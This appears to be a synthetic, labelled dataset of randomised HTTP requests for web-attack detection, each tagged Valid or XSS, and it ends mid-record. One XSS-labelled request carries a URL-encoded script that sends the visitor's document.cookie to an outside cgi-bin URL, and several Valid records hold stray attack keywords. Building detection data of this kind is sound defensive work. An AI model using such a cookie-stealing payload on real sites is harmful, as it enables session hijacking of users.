Last-Modified: Wed, 17 Dec 08 10:18:49 CET
Host: www.ua6nep.cz
Connection: slslinf
Accept: */*;q=0.2
Accept-Charset: us-ascii;q=0.7
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: eo='e'
Client-ip: 48.107.213.247
Cookie: emlarnvr4hmh=ik79;ate=1WF0SWTjfZg;raist5t=ebctbepAuggneRent3;yMnhatjzteh=163;c3Mkb=Sihbr2astt;4dtoa=nwrp-
Cookie2: $Version="973"
Date: Wed, 29 Jun 05 15:02:26 CET
ETag: W/"G2IBnltkcUz955p8"
Expect: btse=6hev
From: sadait@weoM.be
If-Modified-Since: Wed, 18 May 05 09:53:22 GMT
If-Unmodified-Since: Fri, 10 Apr 09 16:56:15 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 5497
MIME-Version: 1.7
Pragma: wh=sCldso
Proxy-Authorization: Basic b21lZm5hYXU6dThjaWE=
Authorization: Basic Y2hvcm9udTpsdHR0WA==
Range: -4
Referer: /rraid.css
TE: deflate
Trailer: Referer
User-Agent: n82J_R http://www.ehav.ch
UA-CPU: StrongARM
UA-Disp: 2741,322,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 354x173
Via: FTP/7.0 www.oaakre.js
Transfer-Encoding: compress
Upgrade: oee/5.6, rhoga/6.1, ehtjsr/7.2, qeweO/5.7
Warning: 940 162.211.201.47:6845 "rajautsi" "Thu, 26 Nov 09 04:54:54 UTC"
X-Forwarded-For: 12.168.45.157
X-Serial-Number: 9480871469062795547
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

eii1e6o=%Tah&ttRort7seq=ay3MIUzH

End - Id: 34000
Start - Id: 26871
class: Valid
GET /oq8bLRusDeftC_dVLzBU.png? HTTP/1.1
Host: www.muyg.uk
Connection: close
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: inhT-Haho
Cache-Control: max-stale=39495
Client-ip: 165.249.81.191
Cookie: iuc=rE
Cookie2: $Version="7"
Date: Sat, 09 Jul 05 09:22:05 CET
ETag: W/"ckZDA9mDdPCDqj@pJwrG"
Expect: nZv2tp
From: eaaum3ie@Tern.net
If-Modified-Since: Wed, 21 Oct 09 03:00:48 GMT
If-Unmodified-Since: Thu, 11 Sep 08 16:23:30 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 22 Aug 04 07:36:09 CET
Max-Forwards: 7132
MIME-Version: 6.2
Pragma: lawyedv=toexr
Proxy-Authorization: NTLM aDFkZGFuY2VpbnJvY3JTYzdqdEE3V3p0YXo3QTllZXI=
Authorization: NTLM Y25waGRsNGFvaXhuVEViZXJpYmVZZWRkbXBqYWJvMHp5Y2VldWlsZG9oOHI=
Range: 2669-620
Referer: /rigmv/qidn/oerte/nhns/Aspsynuh.exe
TE: gzip;q=0.3,trailers
Trailer: If-Match
User-Agent: Mozilla/2.2 (Machintosh; U; PPC Mac OS X 1.0; ol-hu; rv:4.9.9) Gecko/84509069
UA-CPU: StrongARM
UA-Disp: 1462,2709,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 9814x1840
Via: 2.0 www.taejut9t.gif, lsh/8.6 www.4eseseC.png
Transfer-Encoding: compress
Upgrade: leh/4.9, tsgto/9.5
Warning: 859 87.196.54.182 "s9ptiys" 
X-Forwarded-For: 225.193.121.240
X-Serial-Number: 68664107203
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26871
Start - Id: 47800
class: XSS
GET /njwuR1m-I2K4tvsa1fl/hTYcmAtspEfeyi/X0updateuincludel0kY/soJgbt53/n@U0rsFoJ6g4Fxxp/aesx0Tnt/Saej0ymoxidibbt/liva0e6v/hd_KMqYNK/1K8CTevalcAhtpass/of1uQJqh3.pl?ax=%3Cxml+id+++%3D++%22+++++X++%22++%3E%3Ca%3E%3Cb+%3E%26lt%3Bscript%3E%5Bdocument.location.replace++++%28%27http%3A%2F%2Fwww.isnadeto.com%2Fcgi-bin%2Fendenditon.cgi%27%2Bdocument.cookie%29%3B%5D%26lt%3B%2Fscript+%3E%3B%3C%2Fb%3E%3C%2Fa+%3E%3C%2Fxml++%3E&Njobject9positionXxw=bodyoboot.inidbhoeE%2B&amFPaHwp-OCxO=992311&etutcneemiUro=5838988&Oesdi3sle1baaDe=eNweeIslencateap&3tiyiobOm8d=%27t&usrtQuN2zx=heds&neexpti=iotrbtmlpoyt&ctDfOmailii=bhFWPLLzYwW&ia=iR8LExUaz&xzohjdeitWedn=rBa.TSjGdmHl&eendrisw=lU7rPl&e3OI.xxxlzI=vho&4asno7ECi7fmHLn=9155&grahAa7feuo=9827821 HTTP/1.1
Host: 201.125.133.78:9866
Connection: close
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: OSamDr-sssselhm;q=0.5, 3eheu-arsor, sw9-alurtty
Cache-Control: no-transform
Client-ip: 19.80.216.59
Cookie: 9kzl=oii;ie3ensee17se=2;aijbao=c@rkHobrs yesn 
Cookie2: $Version="437"
Date: Mon, 31 Oct 05 01:02:16 GMT
ETag: W/"jgC-8NRikg5ooYRuYC"
Expect: mihtnn
From: abl8eEs@dtibtid.ch
If-Modified-Since: Tue, 08 Nov 05 06:08:54 CET
If-Unmodified-Since: Thu, 16 Aug 07 21:31:50 CET
If-Match: *
If-None-Match: "KNl0xe7l@plskQQjN4v"
If-Range: Thu, 30 Jun 05 01:55:48 UTC
Max-Forwards: 14
MIME-Version: 8.3
Pragma: sscO=tjanyfFo
Proxy-Authorization: Digest username="oaid"
Authorization: Digest username="eoith"
Range: 944229-6,250-
Referer: /eytIetiD/iDaa/lOetno.pl
TE: trailers,gzip;q=0.7,chunked;q=0.2
Trailer: Accept-Language
User-Agent: 0m1M@mED7L http://www.ssar6wi.st
UA-CPU: x86
UA-Disp: 184,045,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 5941x524
Via: 6.4 178.185.206.62, 5.3 www.hse1au.css:21, 4.1 www.lZysch.gif
Transfer-Encoding: compress
Upgrade: cOeQ/0.4, boyed/0.6, stEhr/6.5, lfqeh/2.9
Warning: 828 187.164.150.25 "gathtunnr5k6dxt7" "Sat, 23 Apr 05 07:02:53 UTC"
X-Forwarded-For: 240.35.1.196
X-Serial-Number: 14491
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47800
Start - Id: 24679
class: Valid
GET /2e9noais6o/luySPaoxw4wCsG/K8GGuH8VdPbHy/eroTaqs1/m4riCQqT8Xf/iv2th1eGcchm.jpg?gocsshdint=2223433&QAdivEspCnyLb=0bUD&xoei=5048623&tpdaatEideidl=9217275644&sgg@idrop8=6EQx&D.fG=iBXJ&edOsaPmloeortn=crL1lCkfp7&LbgsoundIhtpassRTr=de3Loou&Durtmy8l=gso&crxfsbp=obixZ&meieea=TwrNsaL%3E6hToombin&enulsmEhnt=0755 HTTP/1.0
Host: 227.246.119.199
Connection: close
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 86.24.145.117
Cookie: Es2iiesP0yhe= mfte;fue=x@J_;kgitttS=2622369;ic=y/e@w\oDseR:=rwmno0aa;vo7bqnrlehtyon=83;iB.aE-=Doscag
Cookie2: $Version="380"
Date: Tue, 15 Aug 06 24:37:54 GMT
ETag: "CjQxeAixKntwuxsLYuD"
Expect: u5o62at
From: tloo@08oaacota.gov
If-Modified-Since: Thu, 06 Aug 09 09:24:26 GMT
If-Unmodified-Since: Thu, 24 Mar 05 10:41:38 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 21 Jan 08 04:49:09 UTC
Max-Forwards: 9
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: eiht4 wSg1Bo=amlc
Authorization: Digest opaque="lczi"
Range: 1773-,147343-45947,-7279
Referer: http://www.vrmni.fr/aeo4ltx/87npvtt/etadei/cstIth/treeuan.doc
TE: deflate;q=0.1,trailers
Trailer: If-Match
User-Agent: oealIA6actt8b
UA-CPU: PowerPC
UA-Disp: 986,554,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 089x5784
Via: 0.0 www.tytitee.shtml, 2.7 61.204.122.193, 6.1 www.edxtte.tiff
Transfer-Encoding: ndnmm; vhltHu=sodneylY
Upgrade: eew3/9.6
Warning: 540 44.10.123.96:4 "peien0ehi" 
X-Forwarded-For: 248.154.151.220
X-Serial-Number: 05865096
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24679
Start - Id: 22339
class: Valid
GET /xy.OPcWnEEidwP/b@mI/qr/jfmhnqzg4c4/psr/Si/_T82AiframeerP4D.css?aroeteheel6eG=lee0d4+s-vbscriptq&sou=nIGmBaF&eutaxnui=02731&esoeEaiq=ic0vonk&T1yeeh=bE&loefalh0nfruo=Agieetitmsoeibalih&hhaiek7=jnny2ah5uarsibfr&Evolhoextdnehee=dtlink%24lAhtpass8ubs%3F%25c+++t&eBpctn=20076809&aouiisthzceo2a=va32group+bye&gnq8hpHDsdmdI=Faullbh%3Cleprocessing-instructionesi+ho&lbl3M=Atih&hunionIatNYhomeLx4=eunionaoticopen%7E&r8butaetr=8922 HTTP/1.0
Host: 121.36.171.156
Connection: close
Accept: image/*
Accept-Charset: *
Accept-Encoding: identity;q=0.7, gzip, deflate;q=0.0, identity, gzip;q=0.4
Accept-Language: *;q=0.9
Cache-Control: no-cache
Client-ip: 186.185.1.249
Cookie: halmbg3slriti=tFrpfZOGy;oer0ck=2839427;mtzeag7tei=sdocumente dUp;lkXM=an(bree@'exec2I;dl6ut=eIRiHbmvrR
Cookie2: $Version="8"
Date: Sun, 09 Dec 07 23:12:12 UTC
ETag: W/"lHVx_e.CMm9IOvVHpR"
Expect: tatnb8n=ndennoq
From: iHpsna2i@sBsaOrTep.ch
If-Modified-Since: Sun, 22 Oct 06 05:14:49 UTC
If-Unmodified-Since: Thu, 23 Dec 04 02:40:45 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 13 Apr 04 01:35:02 UTC
Max-Forwards: 327
MIME-Version: 9.4
Pragma: 6a4telz=dh4u
Proxy-Authorization: NTLM Y2lsaXZtY3JodGlycWRpbXJvbjNrUmVhaGRkbGxob2FzOXNkczI=
Authorization: Digest nc=2e36E9f1
Range: 562648-,892394-
Referer: http://www.lajbta.biz/olot/irtsbnsi/iieeh/uyrstea.jpg
TE: deflate;q=0.5
Trailer: Accept-Language
User-Agent: g@VLMue2W http://www.uosoe.biz
UA-CPU: 68000
UA-Disp: 6322,2576,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 254x8392
Via: aeasy/5.7 www.1isrooer.css, FTP/3.8 www.sStTT.jpg, 6.8 www.dq1toiue.tiff
Transfer-Encoding: identity
Upgrade: ujhe/8.0, pws/9.8
Warning: 187 www.lgNd.js "oZ2fltasalsapdudt" "Wed, 22 Oct 08 15:49:21 CET"
X-Forwarded-For: 81.163.55.171
X-Serial-Number: 8809830
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22339
Start - Id: 17464
class: Valid
GET /rdu4iwcD1_1uRc.yn9qD/sANF0ZHaS7Nz@KBI/div8f/nfzQ7nf/btnPmrleiPpilerrehy/orcWHhOIAMz.php? HTTP/1.0
Host: www.7pns9ita4r.org
Connection: bteo
Accept: */*
Accept-Charset: *
Accept-Encoding: compress;q=0.4
Accept-Language: *;q=0.3
Cache-Control: max-age=7
Client-ip: 177.130.85.221
Cookie: wEryoa5he=xEJ.
Cookie2: $Version="7"
Date: Sun, 07 May 06 06:28:21 CET
ETag: W/"liM.760ulcTeNoyIAWl"
Expect: aunieea5
From: fl3dcevm@tehetciOc.ch
If-Modified-Since: Sun, 10 Sep 06 17:41:34 UTC
If-Unmodified-Since: Sat, 26 Nov 05 24:11:26 GMT
If-Match: "@PEhNeE1VxDONJwJyohy"
If-None-Match: "LO0SGWeuk60S@mvqp9gK"
If-Range: Sun, 11 Apr 10 01:34:32 GMT
Max-Forwards: 943
MIME-Version: 0.4
Pragma: unseNft=nie
Proxy-Authorization: NTLM RXNzaXR0aWFpZXpycmVkZHdvMGtJZGxpZWhoZW9nb3QzMWFidHRiZXJhYUxuaGc=
Authorization: Digest nc=EE37de7C
Range: -46060,-501912,285072-125
Referer: http://www.aroeg.net/ieds2/trgas2ty/llT5a/oadie.dll
TE: chunked,deflate;q=0.5,deflate;q=0.2
Trailer: Authorization
User-Agent: tbchlbfo/2.6
UA-CPU: MIPS
UA-Disp: 5103,184,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 767x663
Via: FTP/1.4 12.123.211.241:23492, 5.6 www.yncl0.js, HTTP/7.1 www.dErgti.css
Transfer-Encoding: compress
Upgrade: pUyt/2.3
Warning: 211 109.34.244.12 "yezUa83tnoebkfw" 
X-Forwarded-For: 29.239.233.138
X-Serial-Number: 4864116530046414
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17464
Start - Id: 7292
class: Valid
POST /eunmsnrtqpftt0L/3muEcTWu_zZ6hiC_.asp? HTTP/1.0
Content-Length: 317
Content-Language: gri4n,a2,uctas
Content-Encoding: deflate
Content-Location: http://www.wymares.com/3temsx/eriocer/zCmaee/tuzitwt/atob.sh
Content-MD5: N21lSXNMb2hkZnQzcjU4NQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 23 Dec 04 01:19:15 CET
Last-Modified: Mon, 13 Apr 09 19:37:18 CET
Host: 215.203.100.72:80
Connection: keep-alive
Accept: */*
Accept-Charset: euc-kr;q=0.0, windows-874;q=0.1, macintosh;q=0.4
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: max-age=99515
Client-ip: 58.170.210.194
Cookie: 97ehn2Ah=e6ecy1nvpoha
Cookie2: $Version="04"
Date: Wed, 14 Sep 05 10:10:15 CET
ETag: W/"EXmkg622urjmA32"
Expect: eOomxsnh=fautnd;TnFoe
From: unwtaXtu@IqrpdtE.de
If-Modified-Since: Wed, 11 Feb 04 05:43:26 UTC
If-Unmodified-Since: Thu, 17 Apr 08 15:47:05 UTC
If-Match: "VTMxj872YK0mw7QGq_Rc"
If-None-Match: *
If-Range: *
Max-Forwards: 089
MIME-Version: 8.8
Pragma: Hnn77mbk=ybScCp
Proxy-Authorization: Basic ZmVlaWU2Yjo0dGxy
Authorization: NTLM d2llbW9hckFpZW9iZ3JpOG9vbnVhZW9vdG15bGV0OWd0
Range: -226356
Referer: http://www.thiwsn.it/yeMsssd/abetlSc/sotbo/etye.asp
TE: trailers,chunked;q=0.7
Trailer: Connection
User-Agent: Mozilla/0.2 (X11; U; Unix 5.1; am-d1; rv:4.1.8) Gecko/21462544
UA-CPU: 68000
UA-Disp: 6402,121,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 1302x7380
Via: 3.6 125.139.162.33, 0.5 www.wvcHkst.png
Transfer-Encoding: ohjto
Upgrade: at1unn/1.6, Eep/3.6
Warning: 751 www.posuze.htm "EnsetciaOAAeiEuha" 
X-Forwarded-For: 145.201.167.246
X-Serial-Number: 35067124458
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~

N0afJFE=199885&0bycoaasX=n1I&qgwp=110790030&ouayteatit7h=ydisto Osuksand&ZscriptK6KMvscriptl5E=234111&ek8sg=  veww'&tetancbitenmf=hMz5rdXOX2&rsFtI3eiad=(n wxp_p)0&1opdEe3bdtuOhl=-e&tnqLkprmhfnefm2=anhsystem oaPlocation&sctoroamoMed=9a betweenHecN-yu&EmE6Ob=602&uOK-WN=cm&to4p5dattm=tbgsoundhand\neof'fxs<s

End - Id: 7292
Start - Id: 30862
class: Valid
GET /iMbkWFBCIJBopoD84.jpg?mhtm08nEmUsA=wna5M6sipWzin55s&8LfZKSVqrPU=naueI+yw&rilt=lgO&bahcse=Rt&ets8Ofti=3372316&itmTsota=eMmrieaah&rinOty=bboot.initsEfu2oez HTTP/1.1
Host: 77.70.181.141
Connection: eEnfpeAi
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: deflate, deflate, compress;q=0.6, compress;q=0.0
Accept-Language: rUnrugoh-d4n;q=0.1, je-h8;q=0.2
Cache-Control: max-age=8
Client-ip: 180.77.147.17
Cookie: ied=ume yscript9nn>inR6 brM<;DMIGlaN=097;xidN=huiaj
Cookie2: $Version="1"
Date: Wed, 13 Aug 08 20:41:48 GMT
ETag: "Z6pfhZSx39qSqs5"
Expect: 100-continue
From: uqfre@ho0adaw.st
If-Modified-Since: Tue, 18 Dec 07 06:12:53 GMT
If-Unmodified-Since: Sat, 07 Jun 08 20:11:32 CET
If-Match: "JgQivf@3dd3.kJ5XZ"
If-None-Match: *
If-Range: *
Max-Forwards: 648
MIME-Version: 2.6
Pragma: erzoaodw=57teto
Proxy-Authorization: NTLM ZW1taGhndG8wSmVuZVdvem9lZUF6aGNkcmpudDlObm5hNWVybnNubnRu
Authorization: NTLM ZWlpMXR0N2RjaXJpOUhaSWVvY253dHFpb2Vyb3U5ZGdrbUg=
Range: -717,-520,-8
Referer: /euiqf.php
TE: trailers,trailers
Trailer: Accept-Charset
User-Agent: cEssossu/6.1
UA-CPU: StrongARM
UA-Disp: 072,6639,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 1014x4541
Via: 7.3 52.37.194.171:8625, 0.4 www.mnxytBam.png, 4.7 132.179.177.122:7
Transfer-Encoding: rswija
Upgrade: eaWbo/6.9, earu/5.0
Warning: 189 www.mlol.css "aohnMtaeseT4szte" 
X-Forwarded-For: 37.25.72.3
X-Serial-Number: 5586644742
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30862
Start - Id: 10419
class: Valid
GET /nconnectmocha/ktcxArh1T2215I/N-Xh/zrHUwBhC/yhtpassZqlrcmdk/vbscriptNn2xzfwgB/esav9ys/iFbSEdLNf/sNstyfeiineiiu/1hZfKgtand3/adminyVsqq9XOnetcatwq/tCDVPQJ-xJ.jpeg?ajmehny1extme=9&J2BtT=etoRl&eexRhjAttnseo=e-i&raerdeTts5stP=836&tdwuttdottU=acl8dnEebmrd1S6ayr&f8srh=idwinnthathpchildtrn%25ct%5Bf&OLO2ePCbfUlT=5&5aoqi8e=aa5a0e8xxdSaDnk&nMssip795d2ierj=hrIlogrp&wdn5leeurelTdU=082915&tnaRErNd=%3Cr HTTP/1.0
Host: www.hlvmsE.biz:9
Connection: keep-alive
Accept: image/png;q=0.9, audio/*;q=0.5, text/*;q=0.1
Accept-Charset: x-mac-cyrillic, iso-8859-5, iso-8859-2
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: min-fresh=4
Client-ip: 245.239.4.223
Cookie: hrtha=gCqS_vIkl;ebs=1;eReelenetve=59844;EBwindow.open6Y.X-G5=36;jNT62OysIoNree=htpasstesd-owinnt-w>>m;otSseeo4tued=tG1GA68rf
Cookie2: $Version="44"
Date: Thu, 21 Apr 05 04:02:09 UTC
ETag: W/"BzX.I-9nsjMNerFZnhB"
Expect: fahp=Eshcsm
From: Lliy5dod@Ctlbdod.com
If-Modified-Since: Wed, 20 May 09 22:35:42 CET
If-Unmodified-Since: Sun, 05 Oct 08 19:53:43 CET
If-Match: *
If-None-Match: "1qGLRkGIuHSfamfn6wg0"
If-Range: *
Max-Forwards: 2
MIME-Version: 2.9
Pragma: l5si=sai
Proxy-Authorization: 2tht ejer=oT7xhiau
Authorization: 0na3 6daIi=eooxuw
Range: 5-355295,61313-1,05930-37268
Referer: http://vlarm.biz/kohnr/eidnw/sgwet6cT/5ttrie/zecSeu.aspx
TE: deflate;q=0.1,gzip
Trailer: From
User-Agent: Mozilla/3.2 (compatible; sDepie; Unix; mop3uanres; a7aasieee; oripkrewci)
UA-CPU: StrongARM
UA-Disp: 1729,6694,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 413x0477
Via: 4.5 www.osooz.js, r15/3.3 www.zseau.jpeg, dsh3o/6.5 www.WHNto6.css
Transfer-Encoding: gzip
Upgrade: rrep7d/0.1, att/3.4, r4ne/4.2, rei/0.5, lefNa/8.3
Warning: 149 www.pwoBteRd.js "729ikaci" 
X-Forwarded-For: 87.106.254.124
X-Serial-Number: 664473
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 10419
Start - Id: 11972
class: Valid
GET /0gwtoc/jbzetcHmw/6stdinZE/ylaedsehednsDt28/aL/E9/cmVR3cXMPqoM1r6/Ntsae7ta2iee.mspx?UBE@NpositionQus=ofer&ecyteueeitlu=o+r%7E+7miahome&Madminformr=%3CrAv HTTP/1.0
Host: www.amooMId2.org
Connection: ag6fr2h
Accept: */*;q=0.7
Accept-Charset: iso-2022-jp;q=0.6, us-ascii, x-mac-greek;q=0.5, windows-874;q=0.0
Accept-Encoding: *
Accept-Language: hreotea-hehla, IsfviwEa-ee0T;q=0.2
Cache-Control: rtsdwhh=itineate
Client-ip: 58.21.151.26
Cookie: 4Yvnzsn=Fht;feumOelorocZ=maAr;7wrnhbiR=frz3;yvbty=868929548;kik9d@MVts=ersttfv 3Thkstylefdsr;xz5t=sfece
Cookie2: $Version="20"
Date: Tue, 07 Sep 04 03:21:51 GMT
ETag: W/"nZXjuQ.-Th6cODR8P"
Expect: 100-continue
From: l9dsl@eam2.uk
If-Modified-Since: Mon, 26 Mar 07 01:28:07 UTC
If-Unmodified-Since: Sat, 02 Oct 04 09:46:03 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 12 Aug 07 09:52:02 UTC
Max-Forwards: 77
MIME-Version: 9.0
Pragma: iodUr2kr='runyFVr'
Proxy-Authorization: Basic bnRlaTpFcjBiY2k=
Authorization: Basic ZG9kdGM6dGRzZTZzYQ==
Range: 984-
Referer: http://www.yora.uk/otcem/re0vu8/d9a8/oiHc/dsmw.swf
TE: gzip,deflate;q=0.4,chunked
Trailer: Date
User-Agent: sbbth/0.3
UA-CPU: x86
UA-Disp: 1461,897,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 630x5808
Via: 0.8 219.137.28.172, 3.4 189.95.147.72, 4.9 www.3ptd.jpg
Transfer-Encoding: koz6s; 26Lsn=orltctem
Upgrade: Ctgnlx/6.7, sct/7.1, 1Se98/3.9, cbmeeR/3.3
Warning: 937 www.troeihrG.css "saelktaa" "Sat, 03 Apr 10 22:28:27 CET"
X-Forwarded-For: 176.49.69.217
X-Serial-Number: 3895037364589724
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11972
Start - Id: 21515
class: Valid
GET /mkbVTAx@/cgY0u1ZktkZ/tRitn6doo5niyr00i/hHUCKw4npOxjEUr79E/onKiNnCUafplYr3i4JyJ/93/rsI5NQV/eHn.tiff?mKyEwrnopyhdip5=eHtmrpotbybr&jtw=94017241&er=762082039 HTTP/1.0
Host: 174.69.240.138
Connection: IO0da3
Accept: video/*;q=0.9, image/*
Accept-Charset: x-mac-arabic;q=0.0, utf-8, euc-kr, x-mac-roman;q=0.6
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 129.114.252.94
Cookie: hepsgtd=ftprietcswyt;DIsall_aPX=aGfblEnnto;aBtenmrqlheea=62621;adehnaatos=8Sotu7fr7perlwe>ncS;iobrhnnn=irb
Cookie2: $Version="57"
Date: Thu, 21 Apr 05 05:04:36 UTC
ETag: W/"iv@b4s9k5Xo4jt0E3"
Expect: bnur
From: suioa@wtliyr.cz
If-Modified-Since: Sat, 29 Jan 05 09:05:12 GMT
If-Unmodified-Since: Sat, 16 Jun 07 10:55:00 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 4
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: bmp0a ri2ne=dbbe7
Range: 9134-
Referer: /uwccvln/Ee0hhdi/niyra/0t4kw.tiff
TE: trailers,trailers,deflate
Trailer: Referer
User-Agent: Mozilla/1.1 (compatible; Konqueror/4.5; Solaris; x2o9uj1p7)
UA-CPU: StrongARM
UA-Disp: 028,1328,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 5415x3665
Via: FTP/6.8 67.53.140.31, 0.0 224.233.243.13, 7.7 www.tqi3itd.js
Transfer-Encoding: compress
Upgrade: plddhm/2.0, afiewd/8.6, tst/4.7
Warning: 989 95.146.49.238 "goslds92assa6" "Thu, 02 Oct 08 01:14:20 UTC"
X-Forwarded-For: 9.183.95.174
X-Serial-Number: 15490998338905562
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21515
Start - Id: 13986
class: Valid
GET /i8lVOXJoQI/eiwrrcwergdPo/swsanv/mmrotnvktibede/gldoClKbtsSkg-ZvPW.html?xrkf9bdhe=e0DL%40K-8d&hrlj=lnimtaoe&laVq2P.x.l03=%5Ct%2Buuecanecp&ottBntzrsfnt=tIi0Iz&tisagpnnEfbtire=34876612&voaOree8aGam=s HTTP/1.0
Host: www.sntamun.org
Connection: close
Accept: text/*
Accept-Charset: windows-1254;q=0.5, iso-8859-8, x-mac-arabic, koi8;q=0.7
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 110.118.82.42
Cookie: C9SZ=ace'eslbp eeae;aiibhev9sH5ele=991699061;asnav=jBdg0bC.4E2z
Cookie2: $Version="37"
Date: Mon, 12 Dec 05 08:05:36 GMT
ETag: "L-TQsQGzGcoyaScA1rs"
Expect: 100-continue
From: s8hvitrs@euHho.st
If-Modified-Since: Sat, 24 Apr 10 03:01:47 GMT
If-Unmodified-Since: Wed, 21 Sep 05 09:58:22 GMT
If-Match: *
If-None-Match: "3XDonp0HhorGn5pvdRL"
If-Range: ".IPKjer5XO2NbZz"
Max-Forwards: 2
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: jjvPD Tebkhb=8eehmla
Authorization: Digest algorithm=MD5
Range: 986633-,-445,64-7061
Referer: http://n1nhrroc.gov/jlres/ee1qhdc/oeiT/nutx.mpeg
TE: trailers
Trailer: Accept-Charset
User-Agent: Lw8a4/2.3
UA-CPU: 68000
UA-Disp: 7939,4903,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 7780x7588
Via: HTTP/9.6 www.qoeyRc.html:579
Transfer-Encoding: gojah
Upgrade: tiowa/3.9, SsnfV/0.1
Warning: 751 www.ninm.html "eskobLtz" 
X-Forwarded-For: 147.149.106.113
X-Serial-Number: 738264285065396
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13986
Start - Id: 15661
class: Valid
GET /SaebesmeBSnsAi3nmt/g9eg/ioHoac0wna/sYQzOSFQ04gx-HC21oFx/lueelsduxg/wp-HFdTrps6echo4fromc/aYglnq2fJrh/dmron3ghhlzaliyibu/ndeFx75.png?rar7iuoXpo=5801&dxuet=elO-_AL&e0N=rvatwltumir&neEaxhl=hOnfq5bL&HasE5ntb2P=79990820&08neh=960974&ri=4KxzWdy&5elhd23tOivr=rp91V&ernp3de=a&nirhaddz6ugrtnj=8+ HTTP/1.1
Host: www.raedshteva.org
Connection: close
Accept: */*
Accept-Charset: x-mac-chinesesimp, x-mac-cyrillic, koi8-r;q=0.8
Accept-Encoding: 
Accept-Language: cnqireje-ie4e;q=0.6
Cache-Control: max-age=97
Client-ip: 187.84.19.85
Cookie: ARCMvKG@o_=39458438;vEn=98549;0Nts=nCknC;eoll=6392703;aoh=tnLcme
Cookie2: $Version="640"
Date: Mon, 03 Nov 08 15:58:59 UTC
ETag: "3ZhpE.ESE7NPEW1r6TbR"
Expect: vir4dq=i1xatt;extc
From: 6rsL@5sohfr.de
If-Modified-Since: Wed, 31 Mar 04 11:45:55 CET
If-Unmodified-Since: Mon, 18 Jul 05 07:25:53 CET
If-Match: *
If-None-Match: *
If-Range: "DEgwbWqPtxTDFihlA"
Max-Forwards: 7
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: reai onoshDhe=eba1
Authorization: Basic ZWZWZTI6cmU3dQ==
Range: -999103
Referer: http://ceal0re.cz/oaO0bteN/Zeillwh.jsp
TE: trailers,chunked
Trailer: Transfer-Encoding
User-Agent: Mozilla/3.3 (Machintosh; U; PPC 2.3; rt-Ls; rv:3.3.9) Gecko/76611577
UA-CPU: PowerPC
UA-Disp: 9331,266,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 2296x8201
Via: 0.6 www.ial74in.jpg, 9.9 www.eetlels.htm
Transfer-Encoding: Pnoo; 7gQtgs=a7woc0en
Upgrade: 6tin9m/2.5
Warning: 523 www.ng7luas.tiff:4 "disElcEdux" 
X-Forwarded-For: 138.24.33.93
X-Serial-Number: 35129354976
----: -------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 15661
Start - Id: 29900
class: Valid
GET /zWPzLFv@xwQO8/rYlog/uteatm/X_._homeHehttpdropt9U.shtml?saacnc77US67eet=2demMn7&aIltaiektouomrE=ee%26+ih&to6wdr=2161258957&otydn=zetiAsnth6&iUgpsc=oehtabpnRtoyhn&tIifqceEira=+o&mecosePNoyr5eo=78910&uquetDcsDoaen8t=t5tanwn6&jnrG=c0se HTTP/1.0
Host: 240.48.32.143:80
Connection: 09bzual
Accept: audio/basic
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: tte-f;q=0.1, e-iowo, tobat-dt
Cache-Control: max-stale
Client-ip: 19.246.75.240
Cookie: y0fr=ni;QvsPtGc69sTw=405;reddretlrweeu=sasasojefbodywp-];doDefrdfdpL=389
Cookie2: $Version="15"
